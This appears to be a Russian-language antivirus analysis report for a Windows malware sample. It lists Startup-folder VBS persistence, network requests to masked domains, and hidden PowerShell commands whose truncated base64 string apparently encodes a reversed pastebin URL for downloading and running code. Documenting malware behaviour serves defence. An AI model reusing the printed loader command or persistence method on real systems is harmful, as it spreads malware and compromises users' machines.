Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
Вредоносные функции
Загружает и запускает на исполнение
- $dll[-1..-$dll.length] -join
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://el##s.store/vbs/15288481603.txt
UDP
- DNS ASK pa###bin.com
- DNS ASK el##s.store
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ExecutionPolicy Bypass -NoProfile -Command "$Codigo = 'JGRsbCA9ICdCN0NuZUd3ei93YXIvbW9jLm5pYmV0c2FwLy86c3B0dGgnOyRSdW1wZUQgPSAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ExecutionPolicy Bypass -NoProfile -Command "$Codigo = 'JGRsbCA9ICdCN0NuZUd3ei93YXIvbW9jLm5pYmV0c2FwLy86c3B0dGgnOyRSdW1wZUQgPSAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZ...
